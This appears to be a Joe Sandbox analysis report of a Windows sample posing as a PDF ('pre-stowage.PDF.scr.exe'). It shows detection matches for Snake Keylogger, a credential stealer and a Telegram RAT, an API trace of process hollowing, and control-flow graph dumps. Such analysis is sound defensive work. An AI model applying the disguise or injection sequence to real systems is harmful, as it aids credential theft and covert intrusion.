                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:02:33:46
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                                                                                                      Imagebase:0x5b0000
                                                                                                      File size:907'264 bytes
                                                                                                      MD5 hash:68DFD91FCE9AD3D728A7C25716990EDD
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:5
                                                                                                      Start time:02:33:46
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:02:33:49
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff7fb730000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:11.5%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:134
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 29523 2e2d560 29524 2e2d5a6 GetCurrentProcess 29523->29524 29526 2e2d5f1 29524->29526 29527 2e2d5f8 GetCurrentThread 29524->29527 29526->29527 29528 2e2d635 GetCurrentProcess 29527->29528 29529 2e2d62e 29527->29529 29530 2e2d66b 29528->29530 29529->29528 29531 2e2d693 GetCurrentThreadId 29530->29531 29532 2e2d6c4 29531->29532 29559 94acc98 29560 94ace23 29559->29560 29562 94accbe 29559->29562 29562->29560 29563 94aaff4 29562->29563 29564 94acf18 PostMessageW 29563->29564 29565 94acf84 29564->29565 29565->29562 29533 795da10 29534 795da58 VirtualProtect 29533->29534 29535 795da92 29534->29535 29566 7950040 29567 795008e DrawTextExW 29566->29567 29569 79500e6 29567->29569 29578 94aa7b2 29579 94aa7bc 29578->29579 29580 94aa9ad 29578->29580 29582 94aba48 29579->29582 29583 94aba5d 29582->29583 29586 94aba79 29583->29586 29584 94aba6f 29584->29580 29587 94abaa2 29586->29587 29595 94abac6 29587->29595 29599 94abeda 29587->29599 29603 94ac125 29587->29603 29608 94ac091 29587->29608 29612 94ac163 29587->29612 29619 94ac3e2 29587->29619 29624 94abffc 29587->29624 29629 94ac37e 29587->29629 29634 94ac03e 29587->29634 29644 94ac659 29587->29644 29649 94abfba 29587->29649 29595->29584 29600 94abf11 29599->29600 29654 94aa330 29599->29654 29658 94aa325 29599->29658 29600->29595 29604 94ac144 29603->29604 29662 94a9a28 29604->29662 29666 94a9a20 29604->29666 29605 94ac79b 29670 94aa0a8 29608->29670 29674 94aa0a1 29608->29674 29609 94abf39 29678 94a9fe1 29612->29678 29682 94a9fe8 29612->29682 29613 94ac8c4 29613->29595 29614 94ac181 29614->29613 29617 94aa0a8 WriteProcessMemory 29614->29617 29618 94aa0a1 WriteProcessMemory 29614->29618 29617->29614 29618->29614 29620 94ac84c 29619->29620 29686 94aa198 29620->29686 29690 94aa190 29620->29690 29621 94ac86e 29625 94ac002 29624->29625 29627 94a9a28 ResumeThread 29625->29627 29628 94a9a20 ResumeThread 29625->29628 29626 94ac79b 29627->29626 29628->29626 29630 94ac384 29629->29630 29631 94ac8c4 29630->29631 29632 94aa0a8 WriteProcessMemory 29630->29632 29633 94aa0a1 WriteProcessMemory 29630->29633 29631->29595 29632->29630 29633->29630 29635 94ac312 29634->29635 29636 94ac8ea 29635->29636 29694 94a9ad8 29635->29694 29698 94a9ad0 29635->29698 29636->29595 29637 94ac013 29638 94ac910 29637->29638 29642 94a9a28 ResumeThread 29637->29642 29643 94a9a20 ResumeThread 29637->29643 29638->29595 29639 94ac79b 29642->29639 29643->29639 29647 94a9ad8 Wow64SetThreadContext 29644->29647 29648 94a9ad0 Wow64SetThreadContext 29644->29648 29645 94ac632 29645->29644 29646 94ac30b 29645->29646 29646->29595 29647->29645 29648->29645 29650 94ac01a 29649->29650 29652 94aa0a8 WriteProcessMemory 29650->29652 29653 94aa0a1 WriteProcessMemory 29650->29653 29651 94ac584 29652->29651 29653->29651 29655 94aa3b9 CreateProcessA 29654->29655 29657 94aa57b 29655->29657 29657->29657 29659 94aa3b9 29658->29659 29659->29659 29660 94aa51e CreateProcessA 29659->29660 29661 94aa57b 29660->29661 29661->29661 29663 94a9a68 ResumeThread 29662->29663 29665 94a9a99 29663->29665 29665->29605 29667 94a9a68 ResumeThread 29666->29667 29669 94a9a99 29667->29669 29669->29605 29671 94aa0f0 WriteProcessMemory 29670->29671 29673 94aa147 29671->29673 29673->29609 29675 94aa0f0 WriteProcessMemory 29674->29675 29677 94aa147 29675->29677 29677->29609 29679 94aa028 VirtualAllocEx 29678->29679 29681 94aa065 29679->29681 29681->29614 29683 94aa028 VirtualAllocEx 29682->29683 29685 94aa065 29683->29685 29685->29614 29687 94aa1e3 ReadProcessMemory 29686->29687 29689 94aa227 29687->29689 29689->29621 29691 94aa1e3 ReadProcessMemory 29690->29691 29693 94aa227 29691->29693 29693->29621 29695 94a9b1d Wow64SetThreadContext 29694->29695 29697 94a9b65 29695->29697 29697->29637 29699 94a9b1d Wow64SetThreadContext 29698->29699 29701 94a9b65 29699->29701 29701->29637 29536 2e24668 29537 2e2467a 29536->29537 29538 2e24686 29537->29538 29540 2e24779 29537->29540 29541 2e2479d 29540->29541 29545 2e24888 29541->29545 29549 2e24878 29541->29549 29546 2e248af 29545->29546 29547 2e2498c 29546->29547 29553 2e244b0 29546->29553 29551 2e248af 29549->29551 29550 2e2498c 29550->29550 29551->29550 29552 2e244b0 CreateActCtxA 29551->29552 29552->29550 29554 2e25918 CreateActCtxA 29553->29554 29556 2e259db 29554->29556 29557 2e2d7a8 DuplicateHandle 29558 2e2d83e 29557->29558 29570 2e2b1f8 29571 2e2b207 29570->29571 29573 2e2b2e0 29570->29573 29576 2e2b324 29573->29576 29577 2e2b301 29573->29577 29574 2e2b528 GetModuleHandleW 29575 2e2b555 29574->29575 29575->29571 29576->29571 29577->29574 29577->29576

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 339 7958aca-7958acc 340 7958b4d 339->340 341 7958ace-7958af0 339->341 342 7958b54-7958b92 call 79590d0 340->342 343 7958b4f 340->343 344 7958a74-7958ac5 341->344 345 7958af2-7958b46 341->345 351 7958b98 342->351 343->342 346 7958ac7-7958ac8 344->346 347 7958a5c-7958a73 344->347 345->340 346->347 347->344 352 7958b9f-7958bbb 351->352 353 7958bc4-7958bc5 352->353 354 7958bbd 352->354 366 7958f1b-7958f22 353->366 354->351 354->353 355 7958ed5-7958ee1 354->355 356 7958d77-7958d8c 354->356 357 7958bf7-7958c09 354->357 358 7958d36-7958d56 354->358 359 7958c96-7958ca8 354->359 360 7958d91-7958d9e 354->360 361 7958cd0-7958cdc 354->361 362 7958dbd-7958dc1 354->362 363 7958e1d-7958e29 354->363 364 7958d1f-7958d31 354->364 365 7958eff-7958f16 354->365 354->366 367 7958d5b-7958d72 354->367 368 7958cfa-7958d1a 354->368 369 7958c40-7958c58 354->369 370 7958da3-7958db8 354->370 371 7958ded-7958df1 354->371 372 7958cad-7958ccb 354->372 373 7958c0b-7958c14 354->373 374 7958eab-7958ed0 354->374 375 7958bca-7958bce 354->375 380 7958ee3 355->380 381 7958ee8-7958efa 355->381 356->352 357->352 358->352 359->352 360->352 390 7958ce3-7958cf5 361->390 391 7958cde 361->391 382 7958dd4-7958ddb 362->382 383 7958dc3-7958dd2 362->383 388 7958e30-7958e46 363->388 389 7958e2b 363->389 364->352 365->352 367->352 368->352 384 7958c5f-7958c75 369->384 385 7958c5a 369->385 370->352 386 7958e04-7958e0b 371->386 387 7958df3-7958e02 371->387 372->352 378 7958c27-7958c2e 373->378 379 7958c16-7958c25 373->379 374->352 376 7958be1-7958be8 375->376 377 7958bd0-7958bdf 375->377 393 7958bef-7958bf5 376->393 377->393 395 7958c35-7958c3b 378->395 379->395 380->381 381->352 397 7958de2-7958de8 382->397 383->397 404 7958c77 384->404 405 7958c7c-7958c91 384->405 385->384 398 7958e12-7958e18 386->398 387->398 406 7958e4d-7958e63 388->406 407 7958e48 388->407 389->388 390->352 391->390 393->352 395->352 397->352 398->352 404->405 405->352 410 7958e65 406->410 411 7958e6a-7958e80 406->411 407->406 410->411 413 7958e87-7958ea6 411->413 414 7958e82 411->414 413->352 414->413
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ry$ry$ry
                                                                                                        • API String ID: 0-128149707
                                                                                                        • Opcode ID: ff04d71e7eb830db755381f20bae632490b43f5a6a3f81e54087bf23e7eb6149
                                                                                                        • Instruction ID: 2180b9803c0697c3129372831d511b5b4aa32f1ead897b677991b34b50e953c6
                                                                                                        • Opcode Fuzzy Hash: ff04d71e7eb830db755381f20bae632490b43f5a6a3f81e54087bf23e7eb6149
                                                                                                        • Instruction Fuzzy Hash: D1E1AFB5E1422ACFCB05CF95D8818AEFBB6FF89315F10896AC415AB344C7349A42CF94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 417 7958b28-7958b4d 419 7958b54-7958b92 call 79590d0 417->419 420 7958b4f 417->420 422 7958b98 419->422 420->419 423 7958b9f-7958bbb 422->423 424 7958bc4-7958bc5 423->424 425 7958bbd 423->425 437 7958f1b-7958f22 424->437 425->422 425->424 426 7958ed5-7958ee1 425->426 427 7958d77-7958d8c 425->427 428 7958bf7-7958c09 425->428 429 7958d36-7958d56 425->429 430 7958c96-7958ca8 425->430 431 7958d91-7958d9e 425->431 432 7958cd0-7958cdc 425->432 433 7958dbd-7958dc1 425->433 434 7958e1d-7958e29 425->434 435 7958d1f-7958d31 425->435 436 7958eff-7958f16 425->436 425->437 438 7958d5b-7958d72 425->438 439 7958cfa-7958d1a 425->439 440 7958c40-7958c58 425->440 441 7958da3-7958db8 425->441 442 7958ded-7958df1 425->442 443 7958cad-7958ccb 425->443 444 7958c0b-7958c14 425->444 445 7958eab-7958ed0 425->445 446 7958bca-7958bce 425->446 451 7958ee3 426->451 452 7958ee8-7958efa 426->452 427->423 428->423 429->423 430->423 431->423 461 7958ce3-7958cf5 432->461 462 7958cde 432->462 453 7958dd4-7958ddb 433->453 454 7958dc3-7958dd2 433->454 459 7958e30-7958e46 434->459 460 7958e2b 434->460 435->423 436->423 438->423 439->423 455 7958c5f-7958c75 440->455 456 7958c5a 440->456 441->423 457 7958e04-7958e0b 442->457 458 7958df3-7958e02 442->458 443->423 449 7958c27-7958c2e 444->449 450 7958c16-7958c25 444->450 445->423 447 7958be1-7958be8 446->447 448 7958bd0-7958bdf 446->448 464 7958bef-7958bf5 447->464 448->464 466 7958c35-7958c3b 449->466 450->466 451->452 452->423 468 7958de2-7958de8 453->468 454->468 475 7958c77 455->475 476 7958c7c-7958c91 455->476 456->455 469 7958e12-7958e18 457->469 458->469 477 7958e4d-7958e63 459->477 478 7958e48 459->478 460->459 461->423 462->461 464->423 466->423 468->423 469->423 475->476 476->423 481 7958e65 477->481 482 7958e6a-7958e80 477->482 478->477 481->482 484 7958e87-7958ea6 482->484 485 7958e82 482->485 484->423 485->484
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ry$ry$ry
                                                                                                        • API String ID: 0-128149707
                                                                                                        • Opcode ID: 145de9b4c059e3e6fc81503b3578f204b5aefdc6078b609bfae51f5e13f9c7a7
                                                                                                        • Instruction ID: 655c0c5ba5df009c3ff66c07bbc8c22d9699400ac708afe3a1703aa9c32e91c6
                                                                                                        • Opcode Fuzzy Hash: 145de9b4c059e3e6fc81503b3578f204b5aefdc6078b609bfae51f5e13f9c7a7
                                                                                                        • Instruction Fuzzy Hash: A9C17BB4D1421ADFCB04CFA9D4858AEFBB6FF89310F208959D915AB354C734AA42CF94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 488 795654d-7956558 489 79565b5-79565e3 488->489 490 795655a-79565b3 488->490 494 79565e5 489->494 495 79565ea-7956644 489->495 490->489 494->495 498 7956647 495->498 499 795664e-795666a 498->499 500 7956673-7956674 499->500 501 795666c 499->501 509 7956820-7956890 500->509 501->498 501->500 502 79566b7-79566bf call 7957271 501->502 503 7956776-795678b 501->503 504 7956790-79567be 501->504 505 79566dc-79566e0 501->505 506 79567ff-795681b 501->506 507 7956679-79566a1 501->507 508 795673b-7956771 501->508 501->509 510 79567c3-79567de 501->510 511 79566a3-79566b5 501->511 512 79567e3-79567fa 501->512 513 795670c-7956736 501->513 521 79566c5-79566d7 502->521 503->499 504->499 514 79566f3-79566fa 505->514 515 79566e2-79566f1 505->515 506->499 507->499 508->499 529 7956892 call 7958967 509->529 530 7956892 call 7958a40 509->530 531 7956892 call 795835e 509->531 532 7956892 call 7958918 509->532 533 7956892 call 7957f7b 509->533 534 7956892 call 7957caa 509->534 510->499 511->499 512->499 513->499 522 7956701-7956707 514->522 515->522 521->499 522->499 528 7956898-79568a2 529->528 530->528 531->528 532->528 533->528 534->528
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Teq$Teq$z^I
                                                                                                        • API String ID: 0-127928066
                                                                                                        • Opcode ID: bba5729cb05d631b307e0b3baac0e3910ca90b3ded75e5a7e16fe75f1cdcb552
                                                                                                        • Instruction ID: 8769eda344e7a63b70cc317790c4cc1076167da3b7ef397205e296c37ee3097a
                                                                                                        • Opcode Fuzzy Hash: bba5729cb05d631b307e0b3baac0e3910ca90b3ded75e5a7e16fe75f1cdcb552
                                                                                                        • Instruction Fuzzy Hash: CAB17CB5E052198FCB04CFA9D880AEDFBB2EF89311F14816AD415BB354DB349906CFA4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 536 7956521-7956540 537 7956542-795654b 536->537 538 795659d-79565e3 536->538 537->538 540 79565e5 538->540 541 79565ea-7956644 538->541 540->541 544 7956647 541->544 545 795664e-795666a 544->545 546 7956673-7956674 545->546 547 795666c 545->547 555 7956820-7956890 546->555 547->544 547->546 548 79566b7-79566bf call 7957271 547->548 549 7956776-795678b 547->549 550 7956790-79567be 547->550 551 79566dc-79566e0 547->551 552 79567ff-795681b 547->552 553 7956679-79566a1 547->553 554 795673b-7956771 547->554 547->555 556 79567c3-79567de 547->556 557 79566a3-79566b5 547->557 558 79567e3-79567fa 547->558 559 795670c-7956736 547->559 567 79566c5-79566d7 548->567 549->545 550->545 560 79566f3-79566fa 551->560 561 79566e2-79566f1 551->561 552->545 553->545 554->545 576 7956892 call 7958967 555->576 577 7956892 call 7958a40 555->577 578 7956892 call 795835e 555->578 579 7956892 call 7958918 555->579 580 7956892 call 7957f7b 555->580 581 7956892 call 7957caa 555->581 556->545 557->545 558->545 559->545 568 7956701-7956707 560->568 561->568 567->545 568->545 574 7956898-79568a2 576->574 577->574 578->574 579->574 580->574 581->574
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Teq$Teq$z^I
                                                                                                        • API String ID: 0-127928066
                                                                                                        • Opcode ID: 91b658027beacd4fe6cbec17e2533fd4bf73a3895352257c769f1966629190f0
                                                                                                        • Instruction ID: 9b2e0d545fb356bf946528c77095617a84d5ff7e0a299116792260b859045a11
                                                                                                        • Opcode Fuzzy Hash: 91b658027beacd4fe6cbec17e2533fd4bf73a3895352257c769f1966629190f0
                                                                                                        • Instruction Fuzzy Hash: C4A135B5E112198FCB04CFA9D880AEDFBB2FF89310F24952AD415BB254DB359906CF94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 582 79565c0-79565e3 583 79565e5 582->583 584 79565ea-7956644 582->584 583->584 587 7956647 584->587 588 795664e-795666a 587->588 589 7956673-7956674 588->589 590 795666c 588->590 598 7956820-7956890 589->598 590->587 590->589 591 79566b7-79566bf call 7957271 590->591 592 7956776-795678b 590->592 593 7956790-79567be 590->593 594 79566dc-79566e0 590->594 595 79567ff-795681b 590->595 596 7956679-79566a1 590->596 597 795673b-7956771 590->597 590->598 599 79567c3-79567de 590->599 600 79566a3-79566b5 590->600 601 79567e3-79567fa 590->601 602 795670c-7956736 590->602 610 79566c5-79566d7 591->610 592->588 593->588 603 79566f3-79566fa 594->603 604 79566e2-79566f1 594->604 595->588 596->588 597->588 619 7956892 call 7958967 598->619 620 7956892 call 7958a40 598->620 621 7956892 call 795835e 598->621 622 7956892 call 7958918 598->622 623 7956892 call 7957f7b 598->623 624 7956892 call 7957caa 598->624 599->588 600->588 601->588 602->588 611 7956701-7956707 603->611 604->611 610->588 611->588 617 7956898-79568a2 619->617 620->617 621->617 622->617 623->617 624->617
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Teq$Teq$z^I
                                                                                                        • API String ID: 0-127928066
                                                                                                        • Opcode ID: 3e816621d878e4780be127de959ec69b9d231b209d2a386d4c1119e96f4f3336
                                                                                                        • Instruction ID: 22f5134e287e1a56d0c4932cd1cf6144119555682c3c12aa55041df12f1cc661
                                                                                                        • Opcode Fuzzy Hash: 3e816621d878e4780be127de959ec69b9d231b209d2a386d4c1119e96f4f3336
                                                                                                        • Instruction Fuzzy Hash: 3A91E4B5E116198FCB04CFAAC984A9DFBB2FF89300F24952AD415BB354D7749901CF54

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 648 795f418-795f43d 649 795f444-795f475 648->649 650 795f43f 648->650 651 795f476 649->651 650->649 652 795f47d-795f499 651->652 653 795f4a2-795f4a3 652->653 654 795f49b 652->654 669 795f70f-795f718 653->669 654->651 654->653 655 795f615-795f61e 654->655 656 795f6f5-795f70a 654->656 657 795f594-795f5a7 654->657 658 795f530-795f542 654->658 659 795f6d9-795f6f0 654->659 660 795f578-795f58f 654->660 661 795f5fb-795f610 654->661 662 795f504-795f52b 654->662 663 795f547-795f54a 654->663 664 795f623-795f64a 654->664 665 795f5e3-795f5f6 654->665 666 795f6c2-795f6d4 654->666 667 795f5ac-795f5b0 654->667 668 795f4ec-795f4ff 654->668 654->669 670 795f64f-795f662 654->670 671 795f68e-795f6a6 654->671 672 795f4a8-795f4ea 654->672 673 795f6ab-795f6bd 654->673 655->652 656->652 657->652 658->652 659->652 660->652 661->652 662->652 685 795f54d call 7956a3c 663->685 686 795f54d call 795f858 663->686 664->652 665->652 666->652 674 795f5c3-795f5ca 667->674 675 795f5b2-795f5c1 667->675 668->652 676 795f675-795f67c 670->676 677 795f664-795f673 670->677 671->652 672->652 673->652 678 795f5d1-795f5de 674->678 675->678 682 795f683-795f689 676->682 677->682 678->652 682->652 683 795f553-795f573 683->652 685->683 686->683
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TuA$UC;"
                                                                                                        • API String ID: 0-2071649361
                                                                                                        • Opcode ID: ce0a3cd109bf34653757390bf7a5366631fc0606d692db44708fcc6065c45572
                                                                                                        • Instruction ID: 494b0ce33abde8b6315b3792bca93e13b2903ab873161f19e90e37af021fcc47
                                                                                                        • Opcode Fuzzy Hash: ce0a3cd109bf34653757390bf7a5366631fc0606d692db44708fcc6065c45572
                                                                                                        • Instruction Fuzzy Hash: EC9119B0D25219EFCB08CFA6E58599EFBB3FF89314F10942AE815A7268D7709542CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 687 795f408-795f43d 688 795f444-795f475 687->688 689 795f43f 687->689 690 795f476 688->690 689->688 691 795f47d-795f499 690->691 692 795f4a2-795f4a3 691->692 693 795f49b 691->693 708 795f70f-795f718 692->708 693->690 693->692 694 795f615-795f61e 693->694 695 795f6f5-795f70a 693->695 696 795f594-795f5a7 693->696 697 795f530-795f542 693->697 698 795f6d9-795f6f0 693->698 699 795f578-795f58f 693->699 700 795f5fb-795f610 693->700 701 795f504-795f52b 693->701 702 795f547-795f54a 693->702 703 795f623-795f64a 693->703 704 795f5e3-795f5f6 693->704 705 795f6c2-795f6d4 693->705 706 795f5ac-795f5b0 693->706 707 795f4ec-795f4ff 693->707 693->708 709 795f64f-795f662 693->709 710 795f68e-795f6a6 693->710 711 795f4a8-795f4ea 693->711 712 795f6ab-795f6bd 693->712 694->691 695->691 696->691 697->691 698->691 699->691 700->691 701->691 724 795f54d call 7956a3c 702->724 725 795f54d call 795f858 702->725 703->691 704->691 705->691 713 795f5c3-795f5ca 706->713 714 795f5b2-795f5c1 706->714 707->691 715 795f675-795f67c 709->715 716 795f664-795f673 709->716 710->691 711->691 712->691 717 795f5d1-795f5de 713->717 714->717 721 795f683-795f689 715->721 716->721 717->691 721->691 722 795f553-795f573 722->691 724->722 725->722
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TuA$UC;"
                                                                                                        • API String ID: 0-2071649361
                                                                                                        • Opcode ID: 388005778a383a799252592c58045249002c3f0df753ae2dea3cc8e837736c3e
                                                                                                        • Instruction ID: 2f99ae826a1f8be3d387df0ea9738a62dc5d6f6c9d883c560e51f7f716bcd955
                                                                                                        • Opcode Fuzzy Hash: 388005778a383a799252592c58045249002c3f0df753ae2dea3cc8e837736c3e
                                                                                                        • Instruction Fuzzy Hash: 2B912BB0D25219DFCB08CFA6E58599EFBB3EF89354F10942AE415B7268D7309942CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5=6
                                                                                                        • API String ID: 0-2897083178
                                                                                                        • Opcode ID: b260b875a817f2359d06d57afa3fc0d17d283da80f3e84631a6f646b96f71f70
                                                                                                        • Instruction ID: 37f29118a8d210019539fc3967a379365f7016eadf5f64f2340cba2c8fc15486
                                                                                                        • Opcode Fuzzy Hash: b260b875a817f2359d06d57afa3fc0d17d283da80f3e84631a6f646b96f71f70
                                                                                                        • Instruction Fuzzy Hash: 596159B4E1521A9FCB08CFA5D9858AEFBF2FF89300F00D92AD416E7214DB749A018F54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5=6
                                                                                                        • API String ID: 0-2897083178
                                                                                                        • Opcode ID: 74064e65c3f92d6c4bacdfd8b506a75d36fecf6ff1731dbbd3ffd527ada7313d
                                                                                                        • Instruction ID: b84ca9328bfd1e5047c7b543b740394ad992a1fc5ee1b7a33eacb050a4933752
                                                                                                        • Opcode Fuzzy Hash: 74064e65c3f92d6c4bacdfd8b506a75d36fecf6ff1731dbbd3ffd527ada7313d
                                                                                                        • Instruction Fuzzy Hash: 39717BB4E1521A9FCB08CFA5D9819AEFBF2FF89300F10D92AD416E7254DB749A018F50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: iUfo
                                                                                                        • API String ID: 0-3820436262
                                                                                                        • Opcode ID: 2d3f91fbcb67a8e5d92a2c5f5db0056041b990f80330c220e12877b32740f596
                                                                                                        • Instruction ID: b7496368d7b1d6bf299e3a553be6f29421555c471e75e2f03fd9251b5c7f61b8
                                                                                                        • Opcode Fuzzy Hash: 2d3f91fbcb67a8e5d92a2c5f5db0056041b990f80330c220e12877b32740f596
                                                                                                        • Instruction Fuzzy Hash: 975104B4E142299FCF14CFAAE5455EEFBB2FB89300F10842AE805BB254EB745A418F54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: iUfo
                                                                                                        • API String ID: 0-3820436262
                                                                                                        • Opcode ID: 8151f37e570b35e45c025bdec7c3af087fbc9a8329453076c6d87ef2de1a84fa
                                                                                                        • Instruction ID: a0c88052d9992880ec9f0b6daccf5599dbcfde680cdb309d89e9a46f90e9f1f8
                                                                                                        • Opcode Fuzzy Hash: 8151f37e570b35e45c025bdec7c3af087fbc9a8329453076c6d87ef2de1a84fa
                                                                                                        • Instruction Fuzzy Hash: C35104B4E112199FCF18CFA9E5456EEFBB2FF89304F10842AE805BB354EB745A018B54
                                                                                                        Strings
